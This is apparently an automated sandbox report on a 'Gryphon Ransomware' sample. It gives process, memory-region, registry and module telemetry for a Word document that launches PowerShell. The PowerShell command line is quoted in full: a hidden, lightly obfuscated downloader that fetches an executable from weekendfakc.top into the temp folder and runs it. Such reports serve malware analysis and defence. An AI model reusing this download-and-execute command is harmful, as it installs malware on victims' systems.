Gryphon Ransomware Analysis | Grouped Behavior

Involved Hosts

Host	Resolved to	Country	City	Protocol
weekendfakc.top	54.205.205.46	US	Ashburn	DNS, HTTP, TCP

Monitored Processes

Behavior Information - Grouped by Category

Process #1: winword.exe

(Host: 314, Network: 0)

Information	Value
ID	#1
File Name	c:\program files\microsoft office\office14\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
Initial Working Directory	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\
Monitor	Start Time: 00:00:08, Reason: Analysis Target
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:15:15

OS Process Information

Information	Value
PID	0x908
Parent PID	0x560 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0001069e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 930 0x 92C 0x 928 0x 924 0x 920 0x 91C 0x 918 0x 914 0x 90C 0x 96C 0x 974 0x 960 0x 990 0x 9A8 0x BA8 0x BAC 0x BC8

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00042fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00062fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x0016ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000170000	0x00170000	0x00172fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000180000	0x00180000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00192fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001a0000	0x001a0000	0x001affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001c0000	0x001c0000	0x002bffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x002c0000	0x00326fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000330000	0x00330000	0x0042ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000430000	0x00430000	0x00432fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000440000	0x00440000	0x0044ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000450000	0x00450000	0x0054ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000550000	0x00550000	0x006d7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006e0000	0x006e0000	0x00860fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000870000	0x00870000	0x01c6ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001c70000	0x01c70000	0x01d6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001d70000	0x01d70000	0x01da0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001db0000	0x01db0000	0x01db4fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001dc0000	0x01dc0000	0x01deffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001df0000	0x01df0000	0x01dfffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e00000	0x01e00000	0x01e00fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e10000	0x01e10000	0x01e1ffff	Private Memory		Region Actions
private_0x0000000001e20000	0x01e20000	0x01e2ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001e30000	0x01e30000	0x01e31fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001e40000	0x01e40000	0x01e4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e50000	0x01e50000	0x01e5ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e60000	0x01e60000	0x01e6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e70000	0x01e70000	0x01e7ffff	Private Memory		Region Actions
private_0x0000000001e80000	0x01e80000	0x01e80fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e90000	0x01e90000	0x01e90fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ea0000	0x01ea0000	0x01eaffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001eb0000	0x01eb0000	0x01ebffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ec0000	0x01ec0000	0x01ecffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ed0000	0x01ed0000	0x01edffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ee0000	0x01ee0000	0x01eeffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ef0000	0x01ef0000	0x01efffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f00000	0x01f00000	0x01f0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f10000	0x01f10000	0x01f1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f20000	0x01f20000	0x01f2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f30000	0x01f30000	0x01f3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f40000	0x01f40000	0x01f4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f50000	0x01f50000	0x01f5ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f60000	0x01f60000	0x01f6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f70000	0x01f70000	0x01f7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f80000	0x01f80000	0x01f8cfff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001f90000	0x01f90000	0x01f90fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001fa0000	0x01fa0000	0x01fa2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001fe0000	0x01fe0000	0x01febfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ff0000	0x01ff0000	0x0202ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002030000	0x02030000	0x020affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000020b0000	0x020b0000	0x0218efff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002190000	0x02190000	0x02190fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000021a0000	0x021a0000	0x021affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002360000	0x02360000	0x0236ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002370000	0x02370000	0x0237ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002380000	0x02380000	0x0238ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002390000	0x02390000	0x0239efff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023a0000	0x023a0000	0x023affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000023b0000	0x023b0000	0x023b0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000023c0000	0x023c0000	0x023c4fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000023d0000	0x023d0000	0x023dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023f0000	0x023f0000	0x023fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002400000	0x02400000	0x0240ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002410000	0x02410000	0x02416fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002420000	0x02420000	0x02421fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000002430000	0x02430000	0x02430fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002440000	0x02440000	0x02440fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002460000	0x02460000	0x024dffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x02620000	0x028eefff	Memory Mapped File	Readable	Region Actions
staticcache.dat	0x028f0000	0x0321ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000003220000	0x03220000	0x0322ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003230000	0x03230000	0x0323ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003240000	0x03240000	0x0324ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003250000	0x03250000	0x032cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000032d0000	0x032d0000	0x03acffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000003ad0000	0x03ad0000	0x03bcffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003bd0000	0x03bd0000	0x03bdffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003be0000	0x03be0000	0x03beffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003bf0000	0x03bf0000	0x03bfffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c00000	0x03c00000	0x03c0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c10000	0x03c10000	0x03c1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c20000	0x03c20000	0x03c2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c30000	0x03c30000	0x03c3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c40000	0x03c40000	0x03c4dfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c50000	0x03c50000	0x03c5ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c60000	0x03c60000	0x03c6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c70000	0x03c70000	0x03c7ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003c80000	0x03c80000	0x03c80fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000003c90000	0x03c90000	0x03c91fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000003ca0000	0x03ca0000	0x03caffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003cb0000	0x03cb0000	0x03d2ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000003d30000	0x03d30000	0x03e2ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003e30000	0x03e30000	0x04222fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000004230000	0x04230000	0x04230fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000004240000	0x04240000	0x04240fff	Pagefile Backed Memory	Readable	Region Actions
wldap32.dll	0x04250000	0x042a1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000042b0000	0x042b0000	0x042bffff	Private Memory	Readable, Writable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db	0x042c0000	0x042dbfff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000042e0000	0x042e0000	0x042e0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000042f0000	0x042f0000	0x043effff	Private Memory	Readable, Writable	Region Actions
msxml6r.dll	0x043f0000	0x043f0fff	Memory Mapped File	Readable	Region Actions
private_0x0000000004400000	0x04400000	0x0440ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004410000	0x04410000	0x0450ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004510000	0x04510000	0x0460ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004610000	0x04610000	0x0461ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004620000	0x04620000	0x0462ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004630000	0x04630000	0x0463ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004640000	0x04640000	0x0464ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004650000	0x04650000	0x0465ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004660000	0x04660000	0x0466ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004670000	0x04670000	0x0467ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004680000	0x04680000	0x0468ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004690000	0x04690000	0x0478ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004790000	0x04790000	0x0479ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000047a0000	0x047a0000	0x047affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000047b0000	0x047b0000	0x047bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000047c0000	0x047c0000	0x047cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000047d0000	0x047d0000	0x047dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000047e0000	0x047e0000	0x047effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000047f0000	0x047f0000	0x048effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000048f0000	0x048f0000	0x048fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004900000	0x04900000	0x0490ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004910000	0x04910000	0x0491ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004920000	0x04920000	0x04a1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004a20000	0x04a20000	0x04a2ffff	Private Memory	Readable, Writable	Region Actions
msctf.dll.mui	0x04a30000	0x04a30fff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000004a40000	0x04a40000	0x04a40fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000004a50000	0x04a50000	0x04a5ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004a60000	0x04a60000	0x04a81fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004a90000	0x04a90000	0x04a9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004aa0000	0x04aa0000	0x04b1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004b20000	0x04b20000	0x04b2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004b30000	0x04b30000	0x04baffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004bb0000	0x04bb0000	0x04bc5fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004bd0000	0x04bd0000	0x04bdffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004be0000	0x04be0000	0x04cdffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004ce0000	0x04ce0000	0x05cdffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000005ce0000	0x05ce0000	0x05ceffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005cf0000	0x05cf0000	0x05cfafff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005d00000	0x05d00000	0x05d05fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005d10000	0x05d10000	0x05d10fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005d20000	0x05d20000	0x05d20fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005d30000	0x05d30000	0x05d30fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005d40000	0x05d40000	0x05d41fff	Private Memory	Readable, Writable	Region Actions
For performance reasons, the remaining 305 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

COM (2)

Operation	Class	Interface	Additional Information	Success	Count	Logfile
Get Class ID			cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell		1	Fn
Create	WScript.Shell	IUnknown	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER		1	Fn

Registry (7)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common	value_name = RequireDeclaration, data = 167, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common	value_name = CompileOnDemand, data = 167, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common	value_name = NotifyUserBeforeStateLoss, data = 167, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common	value_name = BackGroundCompile, data = 167, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common	value_name = BreakOnAllErrors, data = 167, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common	value_name = BreakOnServerErrors, data = 167, type = REG_NONE	1	Fn

Module (67)

Operation	Module	Additional Information	Count	Logfile
Load	Comctl32.dll	base_address = 0x7fefc230000	1	Fn
Load	C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL.DLL	base_address = 0x65300000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x7fefdc90000	1	Fn
Load	VBE7.DLL	base_address = 0x73950000	3	Fn
Get Filename		process_name = c:\program files\microsoft office\office14\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7\VBE7.DLL, size = 260	3	Fn
Get Address	Unknown module name	function = MsoVBADigSigCallDlg, address_out = 0x7feef7d4ecc	1	Fn
Get Address	Unknown module name	function = MsoVbaInitSecurity, address_out = 0x7feeed423fc	1	Fn
Get Address	Unknown module name	function = MsoFIEPolicyAndVersion, address_out = 0x7feeebfb26c	1	Fn
Get Address	Unknown module name	function = MsoFUseIEFeature, address_out = 0x7feeebbc4f8	1	Fn
Get Address	Unknown module name	function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7feeed4235c	1	Fn
Get Address	Unknown module name	function = MsoFInitOffice, address_out = 0x7feeebeb0b8	1	Fn
Get Address	Unknown module name	function = MsoUninitOffice, address_out = 0x7feeebb1274	1	Fn
Get Address	Unknown module name	function = MsoFGetFontSettings, address_out = 0x7feeeb960dc	1	Fn
Get Address	Unknown module name	function = MsoRgchToRgwch, address_out = 0x7feeebbc490	1	Fn
Get Address	Unknown module name	function = MsoHrSimpleQueryInterface, address_out = 0x7feeeb9f400	1	Fn
Get Address	Unknown module name	function = MsoHrSimpleQueryInterface2, address_out = 0x7feeeb9f384	1	Fn
Get Address	Unknown module name	function = MsoFCreateControl, address_out = 0x7feeeba1abc	1	Fn
Get Address	Unknown module name	function = MsoFLongLoad, address_out = 0x7feeee520b0	1	Fn
Get Address	Unknown module name	function = MsoFLongSave, address_out = 0x7feeee52628	1	Fn
Get Address	Unknown module name	function = MsoFGetTooltips, address_out = 0x7feeebbb254	1	Fn
Get Address	Unknown module name	function = MsoFSetTooltips, address_out = 0x7feeef0cba0	1	Fn
Get Address	Unknown module name	function = MsoFLoadToolbarSet, address_out = 0x7feeed0eb84	1	Fn
Get Address	Unknown module name	function = MsoFCreateToolbarSet, address_out = 0x7feeeb97a04	1	Fn
Get Address	Unknown module name	function = MsoInitShrGlobal, address_out = 0x7feeeb9362c	1	Fn
Get Address	Unknown module name	function = MsoHpalOffice, address_out = 0x7feeebb735c	1	Fn
Get Address	Unknown module name	function = MsoFWndProcNeeded, address_out = 0x7feeeb94cb0	1	Fn
Get Address	Unknown module name	function = MsoFWndProc, address_out = 0x7feeeb9c988	1	Fn
Get Address	Unknown module name	function = MsoFCreateITFCHwnd, address_out = 0x7feeeb94e2c	1	Fn
Get Address	Unknown module name	function = MsoDestroyITFC, address_out = 0x7feeee0ce9c	1	Fn
Get Address	Unknown module name	function = MsoFPitbsFromHwndAndMsg, address_out = 0x7feeebaf368	1	Fn
Get Address	Unknown module name	function = MsoFGetComponentManager, address_out = 0x7feeeba0688	1	Fn
Get Address	Unknown module name	function = MsoMultiByteToWideChar, address_out = 0x7feeebb6f90	1	Fn
Get Address	Unknown module name	function = MsoWideCharToMultiByte, address_out = 0x7feeeba1ef0	1	Fn
Get Address	Unknown module name	function = MsoHrRegisterAll, address_out = 0x7feef790114	1	Fn
Get Address	Unknown module name	function = MsoFSetComponentManager, address_out = 0x7feeebc7e48	1	Fn
Get Address	Unknown module name	function = MsoFCreateStdComponentManager, address_out = 0x7feeeb9505c	1	Fn
Get Address	Unknown module name	function = MsoFHandledMessageNeeded, address_out = 0x7feeeba4974	1	Fn
Get Address	Unknown module name	function = MsoPeekMessage, address_out = 0x7feeeba475c	1	Fn
Get Address	Unknown module name	function = MsoGetWWWCmdInfo, address_out = 0x7feef89863c	1	Fn
Get Address	Unknown module name	function = MsoFExecWWWHelp, address_out = 0x7feef898710	1	Fn
Get Address	Unknown module name	function = MsoFCreateIPref, address_out = 0x7feeeb91f98	1	Fn
Get Address	Unknown module name	function = MsoDestroyIPref, address_out = 0x7feeebb11f0	1	Fn
Get Address	Unknown module name	function = MsoChsFromLid, address_out = 0x7feeeb91bac	1	Fn
Get Address	Unknown module name	function = MsoCpgFromChs, address_out = 0x7feeeb9c34c	1	Fn
Get Address	Unknown module name	function = MsoSetLocale, address_out = 0x7feeeb91dec	1	Fn
Get Address	Unknown module name	function = MsoFSetHMsoinstOfSdm, address_out = 0x7feeeb95004	1	Fn
Get Address	Unknown module name	function = SysFreeString, address_out = 0x7fefdc91320	1	Fn
Get Address	Unknown module name	function = LoadTypeLib, address_out = 0x7fefdc9f1e0	1	Fn
Get Address	Unknown module name	function = RegisterTypeLib, address_out = 0x7fefdcecaa0	1	Fn
Get Address	Unknown module name	function = QueryPathOfRegTypeLib, address_out = 0x7fefdd21760	1	Fn
Get Address	Unknown module name	function = UnRegisterTypeLib, address_out = 0x7fefdd220d0	1	Fn
Get Address	Unknown module name	function = OleTranslateColor, address_out = 0x7fefdcbc760	1	Fn
Get Address	Unknown module name	function = OleCreateFontIndirect, address_out = 0x7fefdceecd0	1	Fn
Get Address	Unknown module name	function = OleCreatePictureIndirect, address_out = 0x7fefdcee840	1	Fn
Get Address	Unknown module name	function = OleLoadPicture, address_out = 0x7fefdcff420	1	Fn
Get Address	Unknown module name	function = OleCreatePropertyFrameIndirect, address_out = 0x7fefdcf4ec0	1	Fn
Get Address	Unknown module name	function = OleCreatePropertyFrame, address_out = 0x7fefdcf9350	1	Fn
Get Address	Unknown module name	function = OleIconToCursor, address_out = 0x7fefdcc6e40	1	Fn
Get Address	Unknown module name	function = LoadTypeLibEx, address_out = 0x7fefdc9a550	1	Fn
Get Address	Unknown module name	function = OleLoadPictureEx, address_out = 0x7fefdcff320	1	Fn
Get Address	Unknown module name	function = 716, address_out = 0x73bedea0	3	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-09-07 16:15:54 (UTC)		1	Fn
Get Info	type = Operating System		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String			1	Fn Data

Process #2: powershell.exe

(Host: 543, Network: 54)

Information	Value
ID	#2
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $nJThd = new-object System.Net.WebClient;$kNpOYqxzAkL = new-object random;$str = 'http://test.top/admin.php?f=2 ,http://test.top/admin.php?f=2 ' -replace 'test', 'weekendfakc'; $kCeRq = $str.Split(',');$name = $kNpOYqxzAkL.next(1, 65536);$CQxUPWselP = $env:temp + '' + $name + '.exe';foreach($dOpZTR in $kCeRq){try{$nJThd.DownloadFile($dOpZTR.ToString(), $CQxUPWselP);Start-Process $CQxUPWselP;break;}catch{write-host $_.Exception.Message;}}
Initial Working Directory	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\
Monitor	Start Time: 00:01:41, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:13:42

OS Process Information

Information	Value
PID	0xbb0
Parent PID	0x908 (c:\program files\microsoft office\office14\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0001069e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BB4 0x BCC 0x BD0 0x BD4 0x BDC 0x BE4 0x 84C 0x 69C 0x 8A0 0x 8A8 0x 698 0x 8E0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000060000	0x00060000	0x0006ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000070000	0x00070000	0x00071fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x00080000	0x00082fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0010ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00130fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00151fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000160000	0x00160000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00260000	0x002c6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002d0000	0x002d0000	0x003cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003d0000	0x003d0000	0x00557fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000560000	0x00560000	0x006e0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006f0000	0x006f0000	0x01aeffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001af0000	0x01af0000	0x01beffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001bf0000	0x01bf0000	0x01bf0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001c00000	0x01c00000	0x01c01fff	Pagefile Backed Memory	Readable	Region Actions
cversions.1.db	0x01c10000	0x01c13fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x01c10000	0x01c13fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db	0x01c20000	0x01c3bfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001c40000	0x01c40000	0x01c40fff	Pagefile Backed Memory	Readable, Writable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x01c50000	0x01c7ffff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x01c80000	0x01c83fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001c90000	0x01c90000	0x01c90fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ca0000	0x01ca0000	0x01caffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001cb0000	0x01cb0000	0x01d2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001d30000	0x01d30000	0x01d32fff	Pagefile Backed Memory	Readable, Writable	Region Actions
